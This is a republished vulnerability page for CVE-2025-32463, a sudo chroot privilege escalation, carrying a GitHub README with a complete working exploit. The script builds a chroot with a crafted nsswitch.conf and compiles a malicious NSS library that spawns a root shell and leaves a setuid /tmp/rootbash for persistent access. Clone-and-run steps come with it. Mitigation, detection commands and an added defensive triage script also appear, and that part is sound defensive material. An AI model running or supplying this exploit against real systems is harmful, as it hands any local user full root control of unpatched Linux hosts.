Sudo Chroot Privilege Escalation Vulnerability

Vulnerability Information

Vulnerability name: Sudo Chroot Privilege Escalation Vulnerability

Vulnerability identifier:

  • CVE: CVE-2025-32463

Vulnerability type: privilege escalation

Severity: critical

Description: CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. It lets any local user, whether or not that user has a sudoers entry, escalate to root by abusing a design flaw in how sudo processes the chroot (-R / --chroot) option.

Affected product: sudo is a widely used command-line program that lets users run programs with the privileges of another user. It is a standard tool for administrators and ordinary users on Unix and Linux systems and is installed on almost every Unix-like system.

Explanation: This is a local privilege escalation whose root cause is an ordering flaw in sudo's policy evaluation. The sudoers plugin's own pivot_root() helper (which chroots into the directory given with -R; it is not the Linux pivot_root(2) system call) runs before the sudoers policy is checked, so the attacker controls the file system that sudo consults while resolving the command and looking up users and groups. By placing a crafted nsswitch.conf in the chroot directory and supplying a matching NSS (Name Service Switch) library, the attacker gets sudo to load that library into its root-privileged process, where the library's init routine runs as root.

Impact: The risk is severe because no authentication is needed: the malicious library is loaded while sudo is still evaluating its policy, before any password prompt, and no sudoers rule has to exist for the user. A successful exploit gives complete control of the system: arbitrary command execution, access to sensitive data, and the ability to disrupt services. Exploitation is easy to automate and needs no user interaction. Because sudo is a core component present on almost every Unix-like system, the exposure is broad.

Vendor: sudo

Product: sudo

Affected versions: 1.9.14 <= version <= 1.9.17

Source: https://github.com/KaiHT-Ladiant/CVE-2025-32463

Type: CVE-2025: GitHub search

Repository files

  • README.md
  • cve-2025-32463.sh

Source overview

CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit

Overview

CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. It allows any local user, with or without a sudoers entry, to escalate to root by exploiting a design flaw in how the chroot (-R / --chroot) option is processed.

Vulnerability Details

  • CVE ID: CVE-2025-32463
  • Affected Versions: sudo 1.9.14 - 1.9.17
  • Vulnerability Type: Local Privilege Escalation (LPE)
  • Severity: Critical
  • Patched Version: sudo 1.9.17p1 and later

Technical Description

The vulnerability is an ordering flaw in sudo's policy evaluation, not a race. The sudoers plugin's pivot_root() helper (sudo's own function, which chroots into the directory supplied with -R; not the Linux pivot_root(2) system call) runs before the sudoers policy is verified, so the file system that sudo consults for command resolution and for user and group lookups is under the attacker's control.

Attack Flow

  1. Environment Manipulation: Attacker creates a controlled chroot environment with malicious nsswitch.conf
  2. Library Injection: Malicious NSS (Name Service Switch) library is placed in the controlled environment
  3. Privilege Escalation: sudo loads and executes the malicious library with root privileges
  4. Root Access: Attacker gains full root shell access

Affected Functions

  • pivot_root: Executed too early in the process
  • set_cmnd_path: Operates in the manipulated environment
  • command_matches: Security checks bypassed due to environment manipulation

Prerequisites

Before using this exploit, ensure the following conditions are met:

  • Target system runs sudo version 1.9.14 - 1.9.17 (1.9.17p1 and later are fixed; check the distribution's advisory, because backported fixes can keep an older version string)
  • Any local shell account: no sudoers entry and no chroot rule is required, because the chroot and the NSS module load happen before the sudoers policy is evaluated (the default configuration is vulnerable)
  • gcc compiler is available on the target system
  • Write access to temporary directories (e.g., /tmp)

Usage

Quick Start

  1. Clone this repository:

git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463

  2. Make the script executable:

chmod +x cve-2025-32463.sh

  3. Run the exploit:

./cve-2025-32463.sh

Manual Verification

Check if the target system is vulnerable:

# Check sudo version (vulnerable: 1.9.14 through 1.9.17; fixed: 1.9.17p1 and later)
sudo --version

# Check sudo privileges (informational only: no sudoers entry is needed for this bug)
sudo -l

# Look for chroot-related rules (informational: a chroot rule is not required for exploitation)
sudo -l | grep chroot

Exploit Code

The main exploit script (cve-2025-32463.sh):

#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

# Staging directory: both the chroot target and the NSS module live here.
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

# Payload: runs from the shared object's init routine, i.e. as soon as glibc
# dlopen()s the module inside sudo's root-privileged process.
cat > kai_ht.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

# pentest/ becomes the chroot. Its nsswitch.conf names the passwd source "/kai_ht",
# so glibc derives the module name "libnss_/kai_ht.so.2". Because that name contains
# a slash, the dynamic loader opens it as a path relative to the current directory
# (chroot() does not change the cwd) instead of searching the library path, which is
# why the module is built under STAGE/libnss_/ and not inside pentest/.
mkdir -p pentest/etc libnss_
echo "passwd: /kai_ht" > pentest/etc/nsswitch.conf
# Group lookups inside the chroot still need a group file.
cp /etc/group pentest/etc
# -Wl,-init,woot makes woot() the object's init routine, executed at load time.
gcc -shared -fPIC -Wl,-init,woot -o libnss_/kai_ht.so.2 kai_ht.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
# -R pentest chroots into ./pentest before the sudoers policy is evaluated; the
# command argument ("pentest") never runs because the payload takes over first.
sudo -R pentest pentest

# Cleanup (runs only after the spawned root shell exits)
rm -rf ${STAGE?}

Verification

After successful exploitation, verify root access:

# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access (-p keeps the effective uid instead of dropping it)
/tmp/rootbash -p

Mitigation

Immediate Actions

  1. Update sudo to version 1.9.17p1 or later, or to a distribution build that backports the fix (the chroot option is deprecated starting with 1.9.17p1):

    # Ubuntu/Debian
    sudo apt update && sudo apt upgrade sudo

    # CentOS/RHEL
    sudo yum update sudo

    # or
    sudo dnf update sudo
  2. Do not rely on sudoers changes as a workaround. Removing chroot rules from /etc/sudoers does not prevent exploitation, because the chroot and the NSS module load happen while sudo is still evaluating the policy, before any rule is matched; a user with no sudoers entry at all can trigger the bug. Editing /etc/sudoers with sed is also unsafe in itself, since a syntax error locks everyone out of sudo (always edit with visudo). Until the upgrade is applied, treat every local account on the host as root-equivalent, and confirm the installed build afterwards:

    # Expect 1.9.17p1 or later, or a distro build listed as fixed in its advisory
    sudo --version

Detection

Monitor for exploitation attempts. Note that the PoC's payload runs from the library's init routine while sudo is still evaluating its policy and then exec()s a shell in place of the sudo process, so a successful run does not necessarily produce sudo's usual COMMAND= log line; the on-disk artifacts (the staging directory, the NSS module, /tmp/pwned_proof.txt and the setuid /tmp/rootbash) are the more reliable indicators:

# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

# Look for NSS libraries outside the system library directories. Match on the full
# path, not the basename: the PoC's module is <stage>/libnss_/kai_ht.so.2, so
# -name "libnss_*.so*" would miss it.
find /tmp -path "*libnss_*.so*" -type f
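The following script is an added example for the Manual Verification and Detection sections above; it is not part of the KaiHT-Ladiant repository. It classifies an upstream sudo version string as inside or outside the 1.9.14 .. 1.9.17 range (treating 1.9.17p1 and later as fixed; it cannot recognise distribution backports that keep an older version string), extracts that string from `sudo --version` output, and counts the artifacts the PoC leaves on disk: an etc/nsswitch.conf whose passwd source contains a slash, a shared object named like an NSS module outside the system library directories, and setuid regular files such as the PoC's /tmp/rootbash. The function names, the constructed staging layout and the sample version strings are this example's own.

```sh
#!/bin/sh
# Added example, not part of the CVE-2025-32463 repository.
# Helpers for triaging a host for CVE-2025-32463 (sudo chroot / NSS module load).

# sudo_version_vulnerable VERSION
# Returns 0 if VERSION is an upstream sudo version in 1.9.14 .. 1.9.17 without the
# 1.9.17p1 fix, 1 if it is outside that range, 2 if it cannot be parsed.
sudo_version_vulnerable() {
    ver=$1
    base=${ver%%p*}                     # "1.9.17p1" -> "1.9.17"
    patch=${ver#"$base"}                # "p1" or ""
    patch=${patch#p}; patch=${patch:-0} # "1" or "0"
    case "$base" in *[!0-9.]*|'') return 2 ;; esac
    case "$patch" in *[!0-9]*) return 2 ;; esac
    case "$base" in *.*.*) ;; *) return 2 ;; esac
    major=${base%%.*}; rest=${base#*.}
    minor=${rest%%.*};  micro=${rest#*.}
    case "$micro" in *.*) return 2 ;; esac    # four-part versions are not sudo's format
    [ -n "$major" ] && [ -n "$minor" ] && [ -n "$micro" ] || return 2
    [ "$major" -eq 1 ] && [ "$minor" -eq 9 ] || return 1
    [ "$micro" -ge 14 ] && [ "$micro" -le 17 ] || return 1
    # 1.9.17p1 carries the fix; plain 1.9.17 (patch level 0) does not.
    [ "$micro" -eq 17 ] && [ "$patch" -ge 1 ] && return 1
    return 0
}

# sudo_version_from_output TEXT
# Prints the version token from the first line of `sudo --version` output,
# e.g. "Sudo version 1.9.15p5" -> "1.9.15p5" (prints nothing if it does not match).
sudo_version_from_output() {
    printf '%s\n' "$1" | sed -n '1s/^Sudo version \([0-9][0-9.p]*\).*/\1/p'
}

# scan_staging_dir DIR
# Prints the number of exploitation artifacts found under DIR:
#   - etc/nsswitch.conf files whose passwd source contains "/" (the trick that makes
#     glibc dlopen "libnss_/<name>.so.2" as a path relative to the cwd)
#   - files named like NSS modules (libnss_*.so*), matched on the full path because
#     the PoC's module sits in a directory called libnss_
#   - setuid regular files (the PoC leaves a setuid copy of bash behind)
# Meant for temp locations such as /tmp, /var/tmp and /dev/shm, not for /lib.
scan_staging_dir() {
    dir=$1
    conf_hits=$(find "$dir" -type f -path '*/etc/nsswitch.conf' -exec \
        grep -lE '^[[:space:]]*passwd:[[:space:]]*[^#]*/' {} + 2>/dev/null | wc -l)
    lib_hits=$(find "$dir" -type f -path '*libnss_*.so*' 2>/dev/null | wc -l)
    suid_hits=$(find "$dir" -type f -perm -4000 2>/dev/null | wc -l)
    echo $((conf_hits + lib_hits + suid_hits))
}

# Demonstration on constructed input: recreate the PoC's staging layout in a
# scratch directory (no sudo involved) and classify a few version strings.
demo() {
    scratch=$(mktemp -d)
    mkdir -p "$scratch/pentest/etc" "$scratch/libnss_"
    echo "passwd: /kai_ht" > "$scratch/pentest/etc/nsswitch.conf"
    : > "$scratch/libnss_/kai_ht.so.2"
    : > "$scratch/rootbash"; chmod 4755 "$scratch/rootbash"
    echo "artifacts in constructed staging dir: $(scan_staging_dir "$scratch")"   # 3
    rm -rf "$scratch"
    for v in 1.8.31 1.9.13p3 1.9.14 1.9.15p5 1.9.17 1.9.17p1; do
        if sudo_version_vulnerable "$v"; then echo "$v: in vulnerable range"
        else echo "$v: not affected (or unparsable)"; fi
    done
    echo "parsed: $(sudo_version_from_output 'Sudo version 1.9.15p5')"
}
demo
```

Run it as `sh triage.sh` on the host, then point `scan_staging_dir` at /tmp, /var/tmp and /dev/shm; a non-zero count is a reason to look at the directory by hand, not proof of compromise, since legitimate software can ship setuid files or its own NSS modules.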

Technical Details

Root Cause Analysis

The vulnerability stems from a design flaw in sudo’s execution flow:

  1. Normal Expected Flow:

    • Parse user input
    • Validate sudoers policy
    • Set up environment (including chroot)
    • Execute command
  2. Actual Vulnerable Flow:

    • Parse user input
    • Execute chroot (pivot_root) - Problem occurs here
    • Validate sudoers policy (in manipulated environment)
    • Execute command

NSS Library Exploitation

The exploit leverages the Name Service Switch (NSS) system:

  1. While evaluating the policy, sudo performs user and group lookups, and glibc reads /etc/nsswitch.conf to decide which NSS modules serve them
  2. Because sudo has already chrooted into the attacker's directory, the nsswitch.conf it reads is the attacker's
  3. glibc turns the configured service name into a module name of the form libnss_<service>.so.2 and dlopen()s it inside sudo's root-privileged process; a service name containing a slash ("/kai_ht" in the PoC) makes the loader open "libnss_/kai_ht.so.2" as a path relative to the current directory, which is the staging directory outside the chroot
  4. The library's init routine (the woot() function registered with -Wl,-init,woot) executes arbitrary code as root

Testing Environment

This exploit has been tested on:

  • Ubuntu 20.04/22.04 with sudo 1.9.15
  • Debian 11/12 with sudo 1.9.14-1.9.17
  • CentOS 8/9 with affected sudo versions
  • Docker containers with vulnerable sudo installations

Disclaimer

⚠️ IMPORTANT DISCLAIMER ⚠️

This tool is provided for educational and authorized testing purposes only.

  • Use only on systems you own or have explicit permission to test
  • Unauthorized use of this exploit is illegal and unethical
  • The authors are not responsible for any misuse or damage
  • Always ensure you have proper authorization before conducting security testing

Contributing

Contributions are welcome! Please:

  1. Fork the repository
  2. Create a feature branch
  3. Submit a pull request with detailed description

License

This project is licensed under the MIT License - see the LICENSE file for details.

Changelog

v1.0.0

  • Initial release
  • Basic exploit functionality
  • Comprehensive documentation

Note: This vulnerability affects a critical system component. Please use responsibly and ensure all testing is authorized.


Source page: http://example.com/2025/07/29/github_3917622381/
Author: lianccc
Published: July 29, 2025